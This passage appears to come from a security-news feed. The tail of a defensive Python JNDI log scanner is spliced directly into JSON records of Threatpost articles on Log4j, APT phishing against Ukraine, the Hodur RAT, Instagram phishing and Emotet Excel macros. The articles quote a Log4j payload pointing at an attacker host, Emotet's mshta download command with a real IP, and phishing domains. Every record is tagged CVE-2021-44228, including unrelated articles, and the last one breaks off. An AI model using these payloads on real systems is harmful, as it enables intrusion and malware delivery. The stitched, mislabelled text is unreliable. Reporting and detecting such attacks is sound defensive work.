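    # Return (index, normalized_line, (scheme, host)) for every line that resolves to a
    # JNDI lookup. A hit means the service was probed, not that the lookup succeeded.
    hits = []
    for i, line in enumerate(lines):
        normalized = normalize_lookups(line)
        callback = extract_callback(normalized)
        if callback is not None:
            hits.append((i, normalized, callback))
    return hits


if __name__ == '__main__':
    for index, normalized, (scheme, host) in scan_log(SAMPLE_LOG):
        print(f'line {index}: {scheme} callback to {host}: {normalized}')
```

Feed real access or application log lines to scan_log(); a hit shows the host was probed and names the callback server, which is the outbound LDAP or RMI destination to look for in egress logs when deciding whether the lookup actually completed.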
As has been noted, it takes just a single text string to trigger an application to reach out to an external location if it\u2019s logged via the vulnerable instance of log4j.\n\nAs Hammond told Threatpost, a possible exploit could entail a threat actor supplying special text in an HTTP User-Agent header or a simple POST form request, with the usual form:\n\n${jndi:ldap://maliciousexternalhost.com/resource}\n\n\u2026where maliciousexternalhost.com is an instance controlled by the adversary.\n\nA vulnerable log4j version parses the logged input, performs the JNDI lookup and reaches out to the malicious host. \u201cThe first-stage resource acts as a springboard to another attacker-controlled endpoint, which serves Java code to be executed on the original victim,\u201d according to Huntress. \u201cUltimately, this grants the adversary the opportunity to run any code they would like on the target: remote code execution.\u201d\n\n## Stop, Drop, Hunt It Down\n\nSo much for baking Christmas cookies: It\u2019s going to be a long weekend for a lot of people, according to Casey Ellis, founder and CTO at Bugcrowd, who calls it \u201ca worst-case scenario.\u201d\n\n\u201cThe combination of log4j\u2019s ubiquitous use in software and platforms, the many, many paths available to exploit the vulnerability, the dependencies that will make patching this vulnerability without breaking other things difficult, and the fact that the exploit itself fits into a tweet,\u201d he told Threatpost on Friday via email.\n\nFirst things first, he said, \u201cstop what you\u2019re doing as a software shop and enumerate where log4j exists and might exist in your environment and products.\u201d\n\nHe noted that it\u2019s the kind of software \u201cthat can quite easily be there without making its presence obvious, so we expect the tail of exploitability on this vulnerability to be quite long.\u201d\n\nTim Wade, technical director of the CTO team at Vectra, told Threatpost that the specifics of how attacks will play out are 
\u201cstill a bit open-ended.\u201d But given the widespread use and position of the underlying software, he said, \u201cit absolutely looks like a good candidate for malicious network ingress, which means network defenders should be on guard for suspicious outbound traffic that may indicate command-and-control.\u201d\n\nWade said this is an example of how critical effective detection and response capabilities are, and \u201creally exposes how risky the \u2018prevent, patch, and pray\u2019 strategy that\u2019s so widely adopted in legacy security programs really is.\u201d\n\nJohn Bambenek, principal threat hunter at Netenrich, said that mitigations should be applied ASAP, including updating Java. He told Threatpost that Web application firewalls should also be updated with an appropriate rule to block such attacks.\n\n121021 15:57 UPDATE: Added input from John Hammond, John Bambenek, Tim Wade and Casey Ellis.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T17:58:04", "type": "threatpost", "title": "Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-10T17:58:04", "id": "THREATPOST:D098942E4435832E619282E1B92C9E0F", "href": 
"https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there has been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. 
China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company UkrNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. 
Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex, HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeting Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley 
wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:33", "description": "The Chinese advanced persistent threat (APT) Mustang Panda (a.k.a. Temp.Hex, HoneyMyte, TA416 or RedDelta) has upgraded its espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) \u2013 largely in and around Southeast Asia.\n\nFor one thing, the APT has deployed a brand-new, customized variant of an old but powerful remote-access tool (RAT) called PlugX (aka Korplug), according to researchers from ESET. They named this latest variant \u201cHodur,\u201d after a blind [Norse god](<https://en.wikipedia.org/wiki/H%C3%B6%C3%B0r>) known for slaying his thought-to-be-invulnerable half-brother Baldr.\n\nBeyond that, Mustang Panda has developed a complex array of tactics, techniques and procedures (TTPs) to maximize the efficacy of its attacks.\n\nESET researchers noted, \u201cEvery stage of the deployment process utilizes anti-analysis techniques and control-flow obfuscation.\u201d\n\nThe cyberespionage campaign dates back to at least last August and is still ongoing, according to ESET, and is targeting mainly governments and NGOs. 
Most victims are located in East and Southeast Asia, but there are outliers in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan).\n\nThe attacks begin with social-engineering emails or watering-hole attacks, researchers said.\n\n\u201cThe compromise chain includes decoy documents that are frequently updated and relate to events in Europe [and the war in Ukraine],\u201d noted the team, in a [Wednesday posting](<https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/>). \u201cOne of the filenames related to this campaign is \u201cSituation at the EU borders with Ukraine.exe.\u201d\n\nOther phishing lures mention updated COVID-19 travel restrictions, an approved regional aid map for Greece, and a Regulation of the European Parliament and of the Council.\n\n\u201cThe final lure is a real document available on the European Council\u2019s website,\u201d according to ESET. \u201cThis shows that the APT group behind this campaign is following current affairs and is able to successfully and swiftly react to them.\u201d\n\n## What is Hodur?\n\nHodur derives [from PlugX](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/#:~:text=PlugX%20was%20first%20identified%20in,the%20infected%20system%3B%20and%20more.>), a RAT that \u201callows remote users to perform data theft or take control of the affected systems without permission or authorization. It can copy, move, rename, execute and delete files; log keystrokes; fingerprint the infected system; and more.\u201d\n\nPlugX is one of the oldest malware families around, having existed in some form or another since 2008, with a rise in popularity in the [mid-2010s](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>). Malware that old won\u2019t cut it these days, which is why Mustang Panda has constantly [iterated](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) on it. 
Even just a few weeks ago, researchers from Proofpoint [discovered](<https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european>) an upgrade \u201cchanging its encoding method and expanding its configuration capabilities.\u201d\n\nAccording to ESET, the new variant \u201cmostly lines up with other Korplug variants, with some additional commands and characteristics.\u201d It for instance closely resembles another Norse-themed variant \u2013 Thor \u2013 [discovered](<https://unit42.paloaltonetworks.com/thor-plugx-variant/>) in 2020.\n\n## Sophisticated Attack Chain\n\nHodur itself is hardly the star of the show: Mustang Panda\u2019s campaign features literally dozens of TTPs designed to establish persistence, collect data and evade defenses.\n\nAs mentioned, the campaign begins simply, as the group uses current events to phish their targets. For example, last month, Proofpoint discovered it puppeteering a NATO diplomat\u2019s email address to send out .ZIP and .EXE files titled \u201cSituation at the EU borders with Ukraine.\u201d\n\nIf a target falls for the bait, a legitimate, validly signed, executable vulnerable to DLL search-order hijacking, a malicious DLL, and an encrypted Hodur file are deployed on the target machine.\n\n\u201cThe executable is abused to load the module, which then decrypts and executes the\u2026RAT,\u201d explained researchers. \u201cIn some cases, a downloader is used first to deploy these files along with a decoy document.\u201d\n\nMustang Panda\u2019s campaigns then frequently use custom loaders for shared malware including Cobalt Strike, Poison Ivy, and now, Hodur. Then things get interesting. ESET analysts tallied a total of 44 MITRE ATT&CK techniques deployed in this campaign. 
Most interesting are the 13 different methods of obfuscating or otherwise evading cybersecurity tools and detection.\n\nFor example, the ESET blog noted that \u201cdirectories created during the installation process are set as hidden system directories,\u201d and \u201cfile and directory names match expected values for the legitimate app that is abused by the loader.\u201d\n\nAnd, the malware gaslights you because \u201cscheduled tasks created for persistence use legitimate-looking names,\u201d and \u201cwhen writing to a file, Korplug sets the file\u2019s timestamps to their previous values.\u201d\n\n## **Who\u2019s Behind Mustang Panda?**\n\nCybersecurity analysts have been tracking Mustang Panda [since 2017](<https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda>), when they first started using Mongolian-themed phishing tactics to conduct espionage on targets in Southeast Asia. Still, there\u2019s much we don\u2019t know about the group.\n\nThe depth and complexity of their TTPs puts Mustang Panda more in the company of state-sponsored groups than criminal ones. So \u201cit is possible, though unproven, that they are state-sponsored or at least state-sanctioned,\u201d wrote Mike Parkin, senior technical engineer at Vulcan Cyber, via email.\n\nHistorically, the group has kept to Southeast Asia, with one notable exception \u2013 [the Vatican](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) \u2013 in 2020. The vast majority of targets in ongoing campaigns have, indeed, been located in Mongolia and Vietnam, followed closely by Myanmar. However, as mentioned, the list also includes select entities in Europe and Africa, which muddies the picture a bit.\n\n\u201cThe target distribution is interesting,\u201d Parkin concluded. \u201cThere isn\u2019t enough information publicly available here to determine the attacker\u2019s ultimate agenda.\u201d\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T14:08:06", "type": "threatpost", "title": "Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T14:08:06", "id": "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "href": "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T14:21:33", "description": "A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. 
life insurance company headquartered in New York, researchers have revealed.\n\nAccording to a [report](<https://www.armorblox.com/blog/the-email-bait-and-phish-instagram-phishing-attack>) published by Armorblox on Wednesday, the attack combined brand impersonation with social engineering and managed to bypass Google\u2019s email security by using a valid domain name, eventually reaching the mailboxes of hundreds of employees.\n\n## Scam Looked Identical to Instagram\n\nThe attack began with a simple email. Disguised as an alert from Instagram\u2019s technical support team, it indicated that the recipient\u2019s account was under threat of deactivation. The intention, according to the report, was \u201cto create a sense of urgency while instilling trust in the sender.\u201d\n\n\u201cYou have been reported for sharing fake content in your membership,\u201d read the body of the email. \u201cYou must verify your membership. If you can\u2019t verify within 24 hours your membership will be permanently deleted from our servers.\u201d This message fostered a sense of urgency, to goad the unsuspecting into clicking on a malicious \u201caccount verify\u201d link. Targets who did so ended up on a landing page, where they were asked to submit their Instagram account login information. That information would go straight to the malicious actor, of course, unbeknownst to the target themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16092345/instagram-phishing-email-e1647437038569.png>)\n\nInstagram phishing email. Source: Armorblox.\n\nAt no point did any of these steps \u201clook to be malicious to the common end user, and every touch point, from the email to the account verification form, include Meta and Instagram branding and logos,\u201d the researchers noted.\n\nThe attackers certainly left clues along the way. They made grammar, spelling and capitalization errors in the body of the phishing email. 
In the sender field, the \u201cI\u201d in \u201cInstagram Support\u201d was, in fact, an \u201cL.\u201d And the email domain itself \u2013 membershipform@outlook.com.tr \u2013 clearly didn\u2019t come from Instagram.\n\nStill, the domain itself was perfectly legitimate \u2013 allowing it to bypass traditional spam filters \u2013 and, the researchers explained, \u201cthe sender crafted a long email address, meaning that many mobile users would only see the characters before the \u2018@\u2019 sign, which in this case is \u2018membershipform\u2019 \u2013 one that would not raise suspicion.\u201d\n\n## How to Defend Yourself\n\nJust a few weeks ago, cyberattackers [impersonated](<https://threatpost.com/cyberattackers-docusign-steal-microsoft-outlook-logins/178613/>) the DocuSign e-signature software to steal Microsoft account credentials from a U.S. payment solutions company. In that case, too, hundreds of employees were exposed as a result of dutiful brand impersonation, clever social engineering and a valid email domain that bypassed traditional security measures.\n\nPerhaps these two campaigns were identified and stopped, but what about the next one? Or the one after that? Or other campaigns we haven\u2019t heard about, because they weren\u2019t successfully identified by a security team?\n\nArmorblox\u2019s report suggested four main areas where employees can focus to protect themselves against phishing.\n\n * **Avoid opening emails that you are not expecting**\n * **Augment native email security to stop socially engineered attacks**\n * **Watch out for targeted attacks**\n * **Follow multi-factor authentication and password management best practices**\n\n\u201cTo protect against these attacks, employees should be educated on the value of their email accounts,\u201d wrote Erich Kron of KnowBe4, via email. 
\u201cIn addition, employees need to understand the danger of reusing passwords and using simple passwords to secure accounts both personally and within the organization.\u201d\n\nEven one employee\u2019s slip-up can cause major problems across an organization, followed by other organizations along a supply chain. \u201cTake caution when using business credentials to login across multiple apps,\u201d wrote Armorblox researchers, \u201cespecially social apps that cross over into personal use. The convenience may be tempting; however, it only takes one time for both your sensitive personal and business data to risk exposure.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T04:00:47", "type": "threatpost", "title": "Phony Instagram \u2018Support Staff\u2019 Emails Hit Insurance Company", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T04:00:47", "id": "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "href": "https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T13:47:16", "description": "The infamous Emotet malware has switched tactics yet again, in an email campaign propagating through malicious Excel files, researchers have found.\n\nResearchers at Palo Alto Networks Unit 42 have observed a new infection approach for the high-volume malware, which is known to modify and change its attack vectors to avoid detection so it can continue to do its nefarious work, they [wrote in a report](<https://unit42.paloaltonetworks.com/new-emotet-infection-method/>) published online Tuesday.\n\n\u201cEmotet\u2019s new attack chain reveals multiple stages with different file types and obfuscated script before arriving at the final Emotet payload,\u201d Unit 42 researchers Saqib Khanzada, Tyler Halfpop, Micah Yates and Brad Duncan wrote.\n\nThe new attack vector\u2014discovered on Dec. 21 and still active\u2013delivers an Excel file that includes an obfuscated Excel 4.0 macro through socially engineered emails.\n\n\u201cWhen the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload,\u201d researchers wrote.\n\n## **The Malware That Won\u2019t Die**\n\nEmotet started life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism, at one point existing as a botnet that held more than 1.5 million machines under its control, according to Check Point Software. 
Typical consequences of TrickBot infections are bank-account takeover, high-value wire fraud and ransomware attacks.\n\nIndeed, at the end of its original heyday, the estimated damage from Emotet was around $2.5 billion, researchers have said.\n\nThen, Emotet appeared to be [put out of commission](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. However, it resurfaced [last November](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) on the back of frequent partner-in-crime [TrickBot](<https://threatpost.com/trickbot-cybercrime-elite-affiliates/175510/>) \u2014 and now continues to [be a threat](<https://threatpost.com/emotets-behavior-spread-are-omens-of-ransomware-attacks/176845/>).\n\nSince its return, Emotet has used [thread hijacking](<https://threatpost.com/emotet-returns-100k-mailboxes/162584/>) and other types of tactics as part of novel attack methods.\n\n\u201cThis technique generates fake replies based on legitimate emails stolen from mail clients of Windows hosts previously infected with Emotet,\u201d Unit 42 researchers wrote. \u201cThe botnet uses this stolen email data to create fake replies impersonating the original senders.\u201d\n\nExamples of this method included using links to install a fake Adobe Windows App Installer Package that were [reported](<https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/>) in December, researchers wrote.\n\n## **Using Excel Macros**\n\nThe new Emotet infection method using Excel macros also has several variations, according to Unit 42.\n\n\u201cIn some cases, Emotet uses a password-protected .ZIP archive as an attachment to its email,\u201d researchers explained. 
\u201cIn other cases, Emotet uses an Excel spreadsheet directly attached to the email.\u201d\n\nResearchers outlined an email sent by the Emotet botnet on Jan. 27 that uses a stolen email thread from June 2021. The email uses a lure heralding a \u201cnew announcement\u201d to a \u201cvaluable supplier\u201d and contains an encrypted .ZIP file in an attempt to bypass security systems, researchers wrote. It also includes the password to the .ZIP file in the email, so the victim can extract its contents.\n\n\u201cThe encrypted .ZIP file contains a single Excel document with Excel 4.0 macros,\u201d researchers wrote. \u201cThese macros are an old Excel feature that is frequently abused by malicious actors. The victim must enable macros on a vulnerable Windows host before the malicious content is activated.\u201d\n\nOnce that\u2019s done, the macro code executes cmd.exe to run mshta.exe, with an argument to retrieve and execute a remote HTML application that downloads and executes additional PowerShell code, researchers wrote.\n\n\u201cThe code utilizes hex and character obfuscation in order to attempt to bypass static detection measures,\u201d they explained. \u201cThe deobfuscated command string that is executed is: cmd /c mshta hxxp://91.240.118[.]168/se/s.html.\u201d\n\nThe initial obfuscated PowerShell script connects to hxxp://91.240.118[.]168/se/s.png, a URL that returns text-based script for a second-stage set of PowerShell code designed to retrieve an Emotet binary.\n\n\u201cThis second-stage PowerShell code\u2026contains 14 URLs to retrieve the Emotet binary,\u201d researchers wrote. \u201cThe script attempts each URL until an Emotet binary is successfully downloaded.\u201d\n\nHaving multiple URLs in its attack chain is aimed at making it more resilient in the event that one of the URLs is taken down, researchers said. 
The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted PE from its resource section, they added.\n\n## **Microsoft to Block Macros by Default**\n\nLast week, Microsoft [announced a plan](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) to disable all macros by default in some applications, acknowledging that the mechanism is one of the world\u2019s most popular ways to deliver malware.\n\n\u201cFor the protection of our customers, we need to make it more difficult to enable macros in files obtained from the internet,\u201d the computing giant noted. \u201cVBA macros obtained from the internet will now be blocked by default.\u201d\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft said. \u201cThe default is more secure and is expected to keep more users safe including home users and information workers in managed organizations.\u201d\n\nStarting in late April, instead of a button to \u201cenable macros,\u201d users will be prompted with a \u201clearn more\u201d button that will take them to additional information before they can activate macros within a document.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T13:39:33", "type": "threatpost", "title": "Emotet Now Spreading Through Malicious Excel Files", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T13:39:33", "id": 